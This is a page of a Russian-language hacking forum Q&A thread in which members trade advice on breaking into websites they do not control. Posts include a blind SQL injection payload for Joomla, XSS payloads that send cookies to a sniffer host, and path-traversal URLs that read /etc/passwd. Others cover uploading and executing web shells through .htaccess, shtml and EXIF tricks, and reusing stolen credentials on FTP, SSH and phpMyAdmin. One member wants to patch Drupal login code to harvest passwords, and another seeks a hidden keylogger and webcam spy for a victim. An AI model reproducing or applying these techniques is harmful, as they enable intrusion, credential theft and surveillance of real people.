PDA

Просмотр полной версии : [Задай Вопрос - Получи Ответ]


Страницы : 1 2 [3] 4

KukMan
16.11.2013, 06:30
Подскажите, а что, нет способа убрать суффикс в Local File Inclusion в PHP 5.3.3? Переполнение и нулевой байт не работают

Br@!ns
18.11.2013, 10:42
В какой таблице в джумле можно глянуть список администраторов? или где это вообще поссмотреть?

BigBear
18.11.2013, 19:59
В какой таблице в джумле можно глянуть список администраторов? или где это вообще поссмотреть?




select * from jos_users where usertype= 'Super Administrator';

[B]Joomla

Br@!ns
19.11.2013, 22:06
[QUOTE="BigBear"]

select * from jos_users where usertype= 'Super Administrator';

[B]Joomla

winstrool
19.11.2013, 22:40
В какой таблице в джумле можно глянуть список администраторов? или где это вообще поссмотреть?


как поставели вопрос, такой получили и ответ!


скуля блиндовая, невыйдет. Есть другие способы?


Так и запрос составте под блинд, посимвольно и выдергивайте:


and(select ascii(mid(concat(username),1,1))>40 from jos_users where usertype=0x53757065722 041646D696E6973747261746F72 limit 0,1) --

KroSaver
27.12.2013, 14:52
Здраствуйте.

Какими способами можно распознать движок сайта?

wowgamr
03.01.2014, 12:12
Здравствуйте!

Подскажите, пожалуйста, что за движок?

drdre5.ru

PS нашёл. это бм Shop

fakecoder
15.01.2014, 09:14
Ребята, а не подскажите где можно глянуть исходники Site Sapies любой версии?

В частности интересует с чем там пасс хешится, да и вообще хочется глянуть эту cms

Unknown
15.01.2014, 09:29
Ребята, а не подскажите где можно глянуть исходники Site Sapies любой версии?
В частности интересует с чем там пасс хешится, да и вообще хочется глянуть эту cms


Если вам очень повезет - найдете на каких-нибудь файлопомойках. Вообще это такая самопальная цмска, которую впаривают как "разработку сайта".

Есть маленькое overview:

http://www.sitesapiens.ru/site_sapiens_description.pdf

В таких случаях, как правило, только получив шелл\чтение на одном из сайтов.

UPD: Иногда в таких случаях удается развести авторов на демку этой цмс, попробуйте написать им, прикинувшись потенциальным клиентом.

ysmat
18.01.2014, 18:42
есть ли какие слабости у 1С-битрикс Управление сайтом

согласен на платный приват

Unknown
21.01.2014, 12:18
есть ли какие слабости у 1С-битрикс Управление сайтом
согласен на платный приват


Версия какая? Скриншот /bitrix/admin хотя бы.

jassoc
22.01.2014, 18:48
Кто слышал про GomyeCMS и про её уязвимости? Нашел только одно, и та на китайском. при переводе получается ужасно.

Unknown
30.01.2014, 15:05
Наткнулся на скулю в сайте одного хостинга, сам сайт - почти не дышит, админка в 403. Полагаю, что сайт банально переехал, так как по другому домену отзывается и вообще там все очень хорошо. Но БД старого сайта существует до сих пор и в ней есть таблица
Servers
. Колонки следующие:
ServerID, Active, DateAdded, ServerName, PleskPassword, PleskUserName, SuspendCommand, ControlPanelURL, SharedIPAddress, UnSuspendCommand, SuspendCommandResult, PrimaryDNSServerName, UnSuspendCommandResult, SecondaryDNSServerName, PrimaryDNSServerIPAddress, SecondaryDNSServerIPAddress, AlternativePrimaryDNSServerName, AlternativeSecondaryDNSServerName, AlternativePrimaryDNSServerIPAddress, AlternativeSecondaryDNSServerIPAddress
Также есть таблица
SystemUsers
с колонками:
SystemUserID, SystemUser, SysUserName, Active, ClientAccountLogin, SysPassword
Собственно, есть
url, username, password
для панели Plesk-а. Но под ними отказывается заходить, возможно поменяли все пароли.
Если у кого-то есть какие-либо соображения по этой теме - пожалуйста, не проходите мимо, спрашивайте/указывайте.


Вы все пары логин:пасс проверили? Попробуйте с ними достучаться на другие сервисы, ftp, ssh, sql, если открыты. Поищите что-нибудь вроде phpma где-нибудь рядом. В общем, ищите все, куда можно вбить логин:пасс и вбивайте. Также есть смысл залиться на сервак через соседние сайты и попробовать поднять локально через известные пароли.

Unknown
30.01.2014, 17:00
Да, открыты ftp, ssh, но по ним тоже не подходят пароли. Заметил в БД огрызки WP, там 2 юзера, сейчас их пароли стоят на бруте.
В общем-то собрал небольшую пачку логинов/паролей (кроме тех, которые генерирует Plesk), сейчас эти добрутятся и буду ломиться везде. Дело в том, что этот сайт ссылался на ресурсы "основного" сайта, которые живы и сейчас. Дат нет, поэтому актуальность паролей сложно назвать. Еще и domain : email : psswd, которые лежат в таблице Domains, не подходят на этом самом живом сайте.
Спасибо за ответ, буду пробовать еще и через соседние ломиться.


Знакомая ситуация. Могу посоветовать немного рандомизировать пароли с помощью crunch или cupp. Даты можно косвенно выцепить из версий софта. Также иногда помогают exif-данные загруженных картинок или last-modified заголовки на некоторые страницы.

student96
12.02.2014, 20:00
Подскажите, что означает запрос в логах сайта на wordpress :

GET /?pagehash=371425ff7acc4360c86d097ebe9eb082&cperpage=1

где если подставить в начало запроса домен сайта и обновив открывается главная страница уже с выполненным входом в админ панель.

Так же не понятен что за хэш, не пароль же это входа в админку? Думаю, если был бы взломана база данных и был расшифрован пароль, вход бы производился с обычной страницы входа в админ панель. Спасибо

chekist
13.02.2014, 23:15
Подскажите, что означает запрос в логах сайта на wordpress :
GET /?pagehash=371425ff7acc4360c86d097ebe9eb082&cperpage=1
где если подставить в начало запроса домен сайта и обновив открывается главная страница уже с выполненным входом в админ панель.
Так же не понятен что за хэш, не пароль же это входа в админку? Думаю, если был бы взломана база данных и был расшифрован пароль, вход бы производился с обычной страницы входа в админ панель. Спасибо



Password: 383256

MD5(383256): 371425ff7acc4360c86d097ebe9eb082

скорее всего бекдор

SGskam
14.02.2014, 15:56
я слышал что в базах некоторых интернет-шопов хранится информация о карточках,

которую продают, Что она вообще из себя представляет?

agentru
25.02.2014, 20:21
Нашел сайт на вордпрессе, где стоит уязвимый SWFUpload.

Алерт отлично отрабатывает:

http://***.ru/wp-includes/js/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.coo kie);//

Но когда, я пытаюсь подставить вызов сниффера, скрипт не отрабатывает:

http://***.ru/wp-includes/js/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!img=new Image();img.src='http://***.ru/s.php?cookie='+document.cookie;//

Даже банальная переадресация, также не отрабатывает:

http://***.ru/wp-includes/js/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!location='http://www.example.ru';//

Подскажите пожалуйста, в чем может быть причина?

SGskam
26.02.2014, 21:00
Вообщем такая проблема захожу на сайт в админку.Там есть кнопка администрирования и меня перекидывает ***.ru/admin.php и просто пустая страница, такая же фигня есле же пишу вместо сайта его ip/phpmyadmin просто пустая формаю, может какая защита

yarr2
30.03.2014, 22:15
Подскажите, что означает запрос в логах сайта на wordpress :
GET /?pagehash=371425ff7acc4360c86d097ebe9eb082&cperpage=1
где если подставить в начало запроса домен сайта и обновив открывается главная страница уже с выполненным входом в админ панель.
Так же не понятен что за хэш, не пароль же это входа в админку? Думаю, если был бы взломана база данных и был расшифрован пароль, вход бы производился с обычной страницы входа в админ панель. Спасибо


Это троян в теме. Тут (http://it-notes.ru/wordpress-pagehash-wordpressslog.html) вкратце есть об этом

Unknowhacker
17.04.2014, 10:40
Есть шелл на сайте, которого использует webAsyst, подскажите пожалуйста в каком файле лежат данные администратора.

Unknown
01.10.2014, 20:09
Можно ли в Joomla 1.0.* авторизоваться в админку, если есть session_id администратора?

Br@!ns
11.11.2014, 15:27
Требуется подправить скрипт авторизации в drupal 6+, чтобы сохранялись данные авторизаций в файлике или отсылались на почту. Я так понимаю править нужно modules/user/user.module . Но что то неполучается все правильно сделать, ошибку сайт выдает, при попытке авторизации. Как правильно все настроить?

xobbitua
19.11.2014, 14:02
Как проверить сразу несколько URL на редирект?

Подскажите плиз шаровые или трайал сервисы, чтобы проверить сразу 63 линка на редирект? Нижеуказанный умеет расшифровывать Ютубовские скриптовые коды вида youtube.com/channel/UCAXxzBq3dfQ+V3FN501aMlw, а большинство бесплатных - нет Sad

Если надо проверить редирект отдельных страниц: на сайте сервисов http://try.seoimage.com/check-server-header-check-redirects-tool/ - можно попробовать, но взломать форму я не смог

kcash
19.11.2014, 15:55
под какие версии phpmyadmin есть брутфорс программы?

erwap
09.12.2014, 12:38
Где в БД Drupal найти адрес сайта?

faza02
15.12.2014, 19:10
Где в БД Drupal найти адрес сайта?


https://rdot.org/forum/showthread.php?t=1990


SELECT value FROM variable WHERE name='site_name'

Kolyan333
18.01.2015, 01:56
либо голова не варит либо туплю , есть активка вставляю скрипт, не выполняеться, а в исходнике вижу что мешают символы

">img = new Image(); img.src =\"http://site.ru4_1.gif?\"+document.cookie; как их закодировать? пробовал base не катит

d4rk73rr0r
09.04.2015, 17:00
Здравствуйте уважаемые... есть доступ на ipb 3.4.6 и DLE 10 лицензионный версия, вопрос как залить шелл? в гуглах не нашел нечего подобного. Попробовал как написано здесь (https://rdot.org/forum/showpost.php?p=1344&postcount=4), 1ый, 2ой варианты не помогла. второй способ тоже не получается. Помогите залить шелл. просто не хочу рискнуть и потерять оба сайта ))) заранее спасибо за ответь !!!

sysjuk
09.04.2015, 17:56
↑ (https://antichat.live/posts/3836285/)
Здравствуйте уважаемые... есть доступ на ipb 3.4.6 и DLE 10 лицензионный версия, вопрос как залить шелл? в гуглах не нашел нечего подобного. Попробовал как написано
здесь (https://rdot.org/forum/showpost.php?p=1344&postcount=4)
, 1ый, 2ой варианты не помогла. второй способ тоже не получается. Помогите залить шелл. просто не хочу рискнуть и потерять оба сайта ))) заранее спасибо за ответь !!!


в личку доступ.

StiXy24
14.04.2015, 12:29
Нашел уязвимость.

Вытащил из пачки сайтов примерно вот такие данные:

[LIST=1]

Br@!ns
14.04.2015, 12:35
[QUOTE="StiXy24"]
↑ (https://antichat.live/posts/3837517/)
Нашел уязвимость.
Вытащил из пачки сайтов примерно вот такие данные:
[LIST=1]

StiXy24
14.04.2015, 12:51
↑ (https://antichat.live/posts/3837520/)
везде Localhost ? только пробовать приконнектиться к бд, через вытащенные данные. попробуй найти сперва phpmyadmin или админер на этих серверах. Если нет, то пробуй подключиться к ним внешне


забыл уточнить, все сайты на wordpress

sysjuk
14.04.2015, 13:07
↑ (https://antichat.live/posts/3837531/)
забыл уточнить, все сайты на wordpress


Ну попробуй зайти в myadmin сделай юзера, залей шелл и вауля.

Если myadmin нету, то попробуй через внешнее подключение приконнектится, хотя маловероятно, но пытка не пытка)

sernaid
15.04.2015, 16:29
Доброго дня!

Есть уязвимость LFI в Magento plugin Magmi.

http://www.site.co.uk/shop/magmi/we...intype=utilities&pluginclass=CustomSQLUtility (http://www.site.co.uk/shop/magmi/web/ajax_pluginconf.php?file=../../../../../../../../home/site/public_html/shop/mage&plugintype=utilities&pluginclass=CustomSQLUtility) файл mage читается.

http://www.site.co.uk/shop/magmi/we...intype=utilities&pluginclass=CustomSQLUtility (http://www.site.co.uk/shop/magmi/web/ajax_pluginconf.php?file=../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility)

файл passwd читается.

http://www.site.co.uk/shop/magmi/we...intype=utilities&pluginclass=CustomSQLUtility (http://www.site.co.uk/shop/magmi/web/ajax_pluginconf.php?file=../../../../../../../../home/site/public_html/shop/index.php&plugintype=utilities&pluginclass=CustomSQLUtility)

а вот так с расширением php либо любым другим не читается.

Как прочесть?

Forserer
20.08.2015, 10:37
Какую информацию можно посмотреть по уязвимостям Stress Web желательно версии 13

Kolyan333
28.08.2015, 01:10
ситуация такая

есть csfr



Личные данные:

Имя:

Фамилия:

Дата рождения:



и как здесь включить если нету name в post запросе у меня в html коде

ujanin
22.09.2015, 21:58
↑ (https://antichat.live/posts/3837520/)
везде Localhost ? только пробовать приконнектиться к бд, через вытащенные данные. попробуй найти сперва phpmyadmin или админер на этих серверах. Если нет, то пробуй подключиться к ним внешне


А как найти phpmyadmin если везде написано localhost? мб есть, где почитать на эту тему?

Br@!ns
23.09.2015, 00:23
↑ (https://antichat.live/posts/3893969/)
А как найти phpmyadmin если везде написано localhost? мб есть, где почитать на эту тему?


Сканерами директорий искать. В разделе софт ArxScanSite например.

gQd
23.09.2015, 10:25
есть доступ к админке DLE 10, какие актуальные способы существуют залитие шелла?

ujanin
23.09.2015, 14:28
Такой вопрос. Получается залить шелл, но при заходе на него site/shell.php он не открывается, а скачивается на комп. Почему так и как это победить?

Br@!ns
23.09.2015, 16:05
↑ (https://antichat.live/posts/3894171/)
Такой вопрос. Получается залить шелл, но при заходе на него site/shell.php он не открывается, а скачивается на комп. Почему так и как это победить?


.htaccess так настроен, попробуйте поиграть с расширениями шелла (php3,php4,php5,phtml) или попробуйте перелить штаку в директорию с шеллом.

ujanin
23.09.2015, 16:18
↑ (https://antichat.live/posts/3894206/)
.htaccess так настроен, попробуйте поиграть с расширениями шелла (php3,php4,php5,phtml) или попробуйте перелить штаку в директорию с шеллом.


php3 4 5 - не загружает, phtml грузит, но не исполняет, а загружает. htaccess загружается, но не помогает

с таким содержимым htaccess

AddType application/x-httpd-php .bit

AddHandler application/x-httpd-php .bit

Br@!ns
23.09.2015, 16:27
↑ (https://antichat.live/posts/3894212/)
php3 4 5 - не загружает, phtml грузит, но не исполняет, а загружает. htaccess загружается, но не помогает
с таким содержимым htaccess
AddType application/x-httpd-php .bit
AddHandler application/x-httpd-php .bit


Значит нужная штака на уровень выше. Как реагирует на shtml?

ujanin
23.09.2015, 17:13
↑ (https://antichat.live/posts/3894214/)
Значит нужная штака на уровень выше. Как реагирует на shtml?


Залился. При открытии виден шелл с кусками кода при этом открывается окошко с сообщением Error! Can't open file можно нажать только OK при нажатии ОК все пропадает.

Br@!ns
23.09.2015, 20:00
↑ (https://antichat.live/posts/3894233/)
Залился. При открытии виден шелл с кусками кода при этом открывается окошко с сообщением Error! Can't open file можно нажать только OK при нажатии ОК все пропадает.


Почитайте немного про shtml шелл. Если все перепробовали, скиньте в личку, поссмотрю.

ujanin
25.09.2015, 00:56
↑ (https://antichat.live/posts/3894280/)
Почитайте немного про shtml шелл. Если все перепробовали, скиньте в личку, поссмотрю.


написал в личку, глянь плз.

batko_oo
27.09.2015, 13:40
на одном из форумах стоит установочный mysql

http://sayt.ua/phpmyadmin/setup/index.php

но там висит предпруждения

Невозможно загрузить или сохранить настройки

Пожалуйста, создайте на сервере в корневой директории phpMyAdmin каталог config и установите у него разрешение на запись, как описано в документации. В противном случае вы сможете только скачать, или просмотреть его.

можно там ковыряться ? или же ничего не выйдет ?

TopTG
14.10.2015, 09:06
Есть доступ к админке на drupale. Слышал есть возможность получить доступ к файлам через админку и скопировать их не имею доступа к фтп. Кратко подскажите как?

TopTG
19.10.2015, 18:03
не ужели ни кто не знает?

skanki
05.11.2015, 20:14
Вечер добрый подскажите,пожалуйста,с чего начать для изучения уязвимостей? Достаточно ли только этого форума или есть дочерние сайты,где я бы мог набраться опыта и научиться вашему рукоделию?

Tony123
20.11.2015, 21:06
Помогите в создание сайта, с чего начать, вообще ни чего не знаю толком, но большое желание начать)

Tony123
20.11.2015, 21:07
Тоже хочу научится) Старничёк я с тобой )


↑ (https://antichat.live/posts/3911588/)
Вечер добрый
подскажите,пожалуйста,с чего начать для изучения уязвимостей? Достаточно ли только этого форума или есть дочерние сайты,где я бы мог набраться опыта и научиться вашему рукоделию?

inter2
21.11.2015, 03:55
Заранее извиняюсь, если не туда запостил.

В соседнем топике, что посвящен обзору уязвимостей wordpress, некоторое время тому назад был задан вопрос, а именно:

/threads/50572/page-16#post-3841830 (https://antichat.live/threads/50572/page-16/)

(Как использовать эксплойт)

На что был получен ответ:

/threads/50572/page-16#post-3841833 (https://antichat.live/threads/50572/page-16/)

(нужно отправить POST запрос, где при отправке подменить расширение с jpg на php

шелл будет по адресу /wp-content/gallery/folder_name/shell.php)

Дабы не засорять тему, в которой обсуждался данный момент, решил спросить здесь.

Прошу, если кому не сложно, объяснить и озвучить точный порядок действий именно на вышеописанном примере. Казалось бы суть ясна, однако самостоятельное понимание наверное уже невозможно по причине того, что я все-таки похоже дно Итак его и эдак и в хвост и в гриву как говорится, но все тщетно. Чую, что совершаю какую-то фундаментальную ошибку...

skanki
24.11.2015, 14:38
↑ (https://antichat.live/posts/3918128/)
Тоже хочу научится) Старничёк я с тобой )


да пожалуйста,только надо,чтобы нам хотя бы направление дали,а то так можно все перечитать ,а толку ноль!)

Tony123
26.11.2015, 11:22
↑ (https://antichat.live/posts/3919447/)
да пожалуйста,только надо,чтобы нам хотя бы направление дали,а то так можно все перечитать ,а толку ноль!)


С этим я согласен! Telegram есть у тебя?

Privetiqq
26.11.2015, 19:38
У кого есть толковый кейлоггер безплатный не очень палевный с отсылкой на мыло или фтп логов с клавы и (желательно) звук/фото с вебки? Гуглю день что не найду то либо платное либо паленое очень либо не работает вовсе( Триалок ненадо, радмин не предлагать, у жертвы и так стоит :-D

reye
25.12.2015, 09:44
привет.

на сайте админка реализована через Oauth (vk)

есть что почитать на эту тему?

советы может

morlin
26.01.2016, 17:41
Как узнать IP адрес сервера интернет провайдера? Например Ростелеком или любого другого. Гугл тишина. Знаю только что IP постоянный, т е не меняется.

Dart_Siri
30.01.2016, 12:00
Всем Привет,как узнать через google версию CMS и саму CMS?

nikname555
02.02.2016, 05:40
Доброго времени суток!

Как узнать версию CMS Bitrix?

Спасибо!

powerOfthemind
09.02.2016, 19:04
↑ (https://antichat.live/posts/3920388/)
У кого есть толковый кейлоггер безплатный не очень палевный с отсылкой на мыло или фтп логов с клавы и (желательно) звук/фото с вебки? Гуглю день что не найду то либо платное либо паленое очень либо не работает вовсе( Триалок ненадо, радмин не предлагать, у жертвы и так стоит :-D


fuckav.ru тут смотри, а что б не палился крипторы тебе в помощь. Рекомендую тестить все на виртуалке.

oskantime
10.02.2016, 15:29
есть задача. подготовить отчет об уязвимости определенного сайта и предложения по повышению безопасности. это не должен быть просто выгруженный из сканера файл, а действительно отчет с пояснениями. оплата. если интересует в приват

aldemko
16.02.2016, 13:54
↑ (https://antichat.live/posts/3947731/)
Доброго времени суток!
Как узнать версию CMS Bitrix?
Спасибо!


здесь бывает нарисовано

http://www.site.ru/bitrix/admin/index.php

1С-Битрикс: Управление сайтом 10.0.1. © 2002 Битрикс, 2007 1С-Битрикс

или примерно можно определить по году релиза

Битрикс: Управление сайтом. © 2002-2006 Битрикс

или (в некоторых случаях) - http://www.site.ru/bitrix/updates/updater.log (только это в очень старых версиях - сейчас то и папки такой нет )

если есть доступ к админке - то в разделе обновления

Dr.Silent
26.02.2016, 00:51
Всем привет, возможно я покажусь клоуном, но хотелось бы услышать ответ от опытных юзеров.

С чего начать свой путь?

Да я могу сливать бд через sql dumper, но хочется развиваться, я уверен есть много тем на форуме, чтобы начать с азов. К примеру тему о заливке шелла и прочее, то есть именно где можно почитать и вникнуть, заранее спасибо

Jopashnik
26.02.2016, 13:00
Помогите плз, есть сайт на нем я думаю есть софт. Нужна ссылка на софт, есть два сайта, один , на втором есть зипы, но не тот софт что нужен. Нужен ause, помогите плз

AppS
27.02.2016, 14:34
Если ты ищешь на сайте ausee.ru/main, то его там нету, там ведут ссылки на 2 сайт, I-tt.ru

hxxp://ausee.ru/url/hxxp://www.i-tt.ru/soft/ause.html (http://www.i-tt.ru/soft/ause.html)

А по ссылки

hxxp://www.i-tt.ru/soft/ause.html (http://www.i-tt.ru/soft/ause.html)

Часто задаваемые вопросы по роботу AuSeесть ссылка

hxxp://www.i-tt.ru//soft/AuSe/HELP_AuSe.pdf (http://www.i-tt.ru//soft/AuSe/HELP_AuSe.pdf)

И в завершении качай


hxxp://www.i-tt.ru/soft/AuSe/AuSe.zip

Jopashnik
28.02.2016, 22:57
↑ (https://antichat.live/posts/3957521/)
Если ты ищешь на сайте , то его там нету, там ведут ссылки на 2 сайт,
hxxp:/
А по ссылки
hxxp://
.html (http://www.i-tt.ru/soft/ause.html)
Часто задаваемые вопросы по роботу AuSe
есть ссылка
hxxp://
www..pdf (http://www.i-tt.ru//soft/AuSe/HELP_AuSe.pdf)
И в завершении качай

hxxp://.zip




Спс!! Я люблю тебя Вот не поверишь смотрел я в этой папке файл, затупил и все мелкими буквами написал..

kiyuni
11.03.2016, 09:23
Подскажите, как залить шелл через exif. Почитал несколько статей, сделал gif картинку с кодом в комментарии




Теперь вопрос, как залить нормальный шелл?

phpinfo при помощи запроса http://site.com/shell-image.gif?cmd=phpinfo(); не показывается

Попробовал на своем хостинге промутить, тоже ничего не получилось.

BabaDook
11.03.2016, 11:30
↑ (https://antichat.live/posts/3961973/)
Подскажите, как залить шелл через exif. Почитал несколько статей, сделал gif картинку с кодом в комментарии



Теперь вопрос, как залить нормальный шелл?
phpinfo при помощи запроса
http://site.com/shell-image.gif?cmd=phpinfo();
не показывается
Попробовал на своем хостинге промутить, тоже ничего не получилось.


Пожалуйста, попробуйте сделать так

http://site.com/shell-image.gif?cmd= (http://site.com/shell-image.gif?cmd=phpinfo();)ls or http://site.com/shell-image.gif?cmd= (http://site.com/shell-image.gif?cmd=phpinfo();)whoami если ничего не выполняется возможно вы забыли про Эйчтиассес

kiyuni
11.03.2016, 11:48
↑ (https://antichat.live/posts/3961993/)
Пожалуйста, попробуйте сделать так
http://site.com/shell-image.gif?cmd= (http://site.com/shell-image.gif?cmd=phpinfo();)
ls or
http://site.com/shell-image.gif?cmd= (http://site.com/shell-image.gif?cmd=phpinfo();)
whoami если ничего не выполняется возможно вы забыли про Эйчтиассес


Ничего не выводится, все также открывается просто картинка

BabaDook
11.03.2016, 11:55
↑ (https://antichat.live/posts/3962003/)
Ничего не выводится, все также открывается просто картинка


Так посмотрите , вы картинку залили , возможно с кодом, но она обрабатывается как картинка, код не обрабатывается

[XOR]
11.03.2016, 17:24
Помогите разобраться. Просканировал сайт сканером w3af-ом он выдал следующее:


eval() input injection was found at: "http://site.com/index.php", using HTTP method
POST. The sent data was: "app=core&module=search&do=search&fromMainBar=1" The modified
parameter was "do". This vulnerability was found in the requests with ids 10511, 10569,
10651, 10734 and 10837.

eval() input injection was found at:
"http://site.com/index.php?app=core&module=search&do=search&fromMainBar=1", using
HTTP method POST. The sent post-data was:
"...usedInJsLater=aHR0cDovL21ldHJvbG9ndS5ydS9pbmRle C5waHA/YXBwPWNvcmU..." which
modifies the "usedInJsLater" parameter. This vulnerability was found in the requests
with ids 10510, 10580, 10654, 10760 and 10873.

Это ложное срабатывание? Как проверить? Пробовал так do=phpinfo() но ничего не выводит.

BabaDook
11.03.2016, 17:35
"]
[XOR] said:
↑ (https://antichat.live/posts/3962113/)
Помогите разобраться. Просканировал сайт сканером
w3af
-ом он выдал следующее:

eval() input injection was found at: "http://site.com/index.php", using HTTP method
POST. The sent data was: "app=core&module=search&do=search&fromMainBar=1" The modified
parameter was "do". This vulnerability was found in the requests with ids 10511, 10569,
10651, 10734 and 10837.

eval() input injection was found at:
"http://site.com/index.php?app=core&module=search&do=search&fromMainBar=1", using
HTTP method POST. The sent post-data was:
"...usedInJsLater=aHR0cDovL21ldHJvbG9ndS5ydS9pbmRle C5waHA/YXBwPWNvcmU..." which
modifies the "usedInJsLater" parameter. This vulnerability was found in the requests
with ids 10510, 10580, 10654, 10760 and 10873.

Это ложное срабатывание? Как проверить? Пробовал так do=phpinfo() но ничего не выводит.


Возможно, . w3af бывает чудит, однако лучше ручкаи проверить

t0ma5
11.03.2016, 17:56
"]
[XOR] said:
↑ (https://antichat.live/posts/3962113/)
Помогите разобраться. Просканировал сайт сканером
w3af
-ом он выдал следующее:

eval() input injection was found at: "http://site.com/index.php", using HTTP method
POST. The sent data was: "app=core&module=search&do=search&fromMainBar=1" The modified
parameter was "do". This vulnerability was found in the requests with ids 10511, 10569,
10651, 10734 and 10837.

eval() input injection was found at:
"http://site.com/index.php?app=core&module=search&do=search&fromMainBar=1", using
HTTP method POST. The sent post-data was:
"...usedInJsLater=aHR0cDovL21ldHJvbG9ndS5ydS9pbmRle C5waHA/YXBwPWNvcmU..." which
modifies the "usedInJsLater" parameter. This vulnerability was found in the requests
with ids 10510, 10580, 10654, 10760 and 10873.

Это ложное срабатывание? Как проверить? Пробовал так do=phpinfo() но ничего не выводит.


может что то такое проканает

do=echo "test";exit;//

do=;echo "test";exit;//

do= && echo "test";exit;//

etc

в урл энкод только надо обернуть

phpinfo в редких случаях может быть например отключена

t0ma5
11.03.2016, 18:06
↑ (https://antichat.live/posts/3961973/)
Подскажите, как залить шелл через exif. Почитал несколько статей, сделал gif картинку с кодом в комментарии



Теперь вопрос, как залить нормальный шелл?
phpinfo при помощи запроса
http://site.com/shell-image.gif?cmd=phpinfo();
не показывается
Попробовал на своем хостинге промутить, тоже ничего не получилось.


ну если бы гифки выполнялись как пхп это было бы ммм ^_^

как проверить выполняется код или нет? скачай свою гифку с сайта, открой в блокноте, видишь пхп код? если да значит он стопудово не выполнился, если не видишь - значит он либо выполнился, либо порезался на этапе загрузки

по дефолту конечно он выполнятся не будет, вообще в большинстве случаев запрос даже не дойдет до апача->пыхи, картинку отдаст nginx( который сейчас используется почти везде )

даже если запрос дойдет таки до апача, оный должен понять как обработать файл, для это есть хендлеры, в манах есть примеры

https://httpd.apache.org/docs/2.2/ru/handler.html

как правильно сказал BabaDook (https://antichat.live/members/263150/) нужно подредактировать .htaccess, добавив хендлер для своего шелла

user6334
30.03.2016, 20:39
Подскажите, тут кто-нибудь писал про уязвимости Ruby on rails?

drveb
01.04.2016, 21:48
Вопрос такой - Можно ли в код яндекс метрики спрятать шелл?

blackhead
02.04.2016, 20:15
Подскажите по движку typo3 (версия TYPO3 4.5 CMS). В базе есть таблицы be_users и fe_users, но логины и пароли к админке (cайт/typo3/index.php) не подходят. Кто знаком с typo3 подскажите!

adamabakumov
05.04.2016, 23:45
Есть сайт на немного странном php фреймворке fuelPHP. Сайт онлайн, доступа нету. Нашел такие уязвимости http://fuelphp.com/security-advisories и http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1999. Звучит так "The auto-format feature in the Request_Curl class in FuelPHP 1.1 through 1.7.1 allows remote attackers to execute arbitrary code via a crafted response." Как проверить имеет ли сайт уязвимость (актуальна ли версия фреймворка). Где можно почитать про эксплуатацию подобного рода уязвимостей?

pas9x
06.04.2016, 00:40
↑ (https://antichat.live/posts/3970652/)
Есть сайт на немного странном php фреймворке fuelPHP. Сайт онлайн, доступа нету. Нашел такие уязвимости
http://fuelphp.com/security-advisories
и
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1999
. Звучит так "The auto-format feature in the Request_Curl class in FuelPHP 1.1 through 1.7.1 allows remote attackers to execute arbitrary code via a crafted response." Как проверить имеет ли сайт уязвимость (актуальна ли версия фреймворка). Где можно почитать про эксплуатацию подобного рода уязвимостей?


Для эксплуатации уязвимости нужно знать пхп. Если ты его не знаешь или не имеешь опыта создания сайтов на пхп то использовать уязвимость не получится. Если знаешь то нужно скачать уязвимую верси fuelphp, открыть исходники, на локалхосте изучить уязвимость и опробовать её. Дальше имея опыт эксплуатации уязвимости в лабораторных условиях можешь сделать попытку эксплуатации на рабочем сайте. И если будет успех то вообще можешь эксплоит для этой уязвимости сделать и будешь крут.

adamabakumov
06.04.2016, 00:51
PHP знаю, но с данным фреймворком не работал. Вот времени правда мало. Можно ли узнать версию фреймворка? Что можно почитать по теме?

sysjuk
12.04.2016, 08:53
Необходима помощь в поиске адмнки - aeuso.org.

w28
20.04.2016, 11:05
↑ (https://antichat.live/posts/3974307/)
Из-за косяка сайта
http://vk.com/
некоторые закрытые фотографии (УДАЛЁННОГО уже в ВК аккаунта) были загробастаны двумя недобросовестными сайтами. Google удалить их из индексации не желает, а поддержка ВК зашилась. Фотографии надо зачистить из индексации или из этих грабберов.
Что стоит предпринять в этом случае?


При долгосрочном оффлайне сайта он удаляется или понижается в индексации, атаковать сайт долгосрочно, есть вариант сделать от лица юрисдикции еще, но это уже в зависимости от владельцев сайтов, если испугаются - то удалят, если не испугаются и пошлют - шанс того что ты заставишь их даже через суд удалить эти фотографии очень мал.

Vitam1n
24.04.2016, 17:03
Ребят, а кто-то может помочь с sql-inj? Есть сайт, там ссылка типа /index.php?pageid=456. Если вставить кавычку или дописать что-то, отличное от пробела и отправить запрос, то в ответ придет пустая страница с текстом Incorrect url. Если сделать запрос вида /index.php?pageid=456 AND 1=1, то вернется ошибка 403 Forbidden.

Кто-то знает, что за ересь там происходит? Это waf? Что делать в таком случае?

traan
27.04.2016, 20:41
Как на практике можно использовать уязвимость Arbitrary File Download?

Т.е. Насколько серьёзной она является и чего можно добиться. Ну к примеру на Wordpress: я нашёл уязвимые сайты, смогу получить wp-config.php. Есть логин:пароль к БД, сервер. А дальше как? Можно как-то эти данные применить? Чего можно достичь? Хочется конечно свой скрипт php загрузить/записать на сервер. Но как?

Обычно хостер не позволяет подключение к серверу БД со стороннего хоста. В этом случае всё?

Если позволяет, то максимум что соображаю создать пользователя с правами админа и редактировать шаблон, но палевно же.

blackbox
27.04.2016, 20:52
↑ (https://antichat.live/posts/3978483/)
Как на практике можно использовать уязвимость Arbitrary File Download?
Т.е. Насколько серьёзной она является и чего можно добиться. Ну к примеру на Wordpress: я нашёл уязвимые сайты, смогу получить wp-config.php. Есть логин:пароль к БД, сервер. А дальше как? Можно как-то эти данные применить? Чего можно достичь? Хочется конечно свой скрипт php загрузить/записать на сервер. Но как?
Обычно хостер не позволяет подключение к серверу БД со стороннего хоста. В этом случае всё?
Если позволяет, то максимум что соображаю создать пользователя с правами админа и редактировать шаблон, но палевно же.


Phpmyadmin можно найти попробовать и залогинится с этими данным. Ну банальщина вроде попытки использовать эти данные для других сервисов. Ну и конечно скачивание конфигов и других потенциально полезных файлов, в том числе чтобы новые зацепки найти. Такое вот.

Vitam1n
28.04.2016, 14:01
Прошу прощения, что вмешиваюсь, а на мой вопрос кто-то может ответить, пожалуйста? Я уверен, что тут есть знающие люди. Очень интересно узнать, в чем проблема.

traan
28.04.2016, 19:45
↑ (https://antichat.live/posts/3978488/)
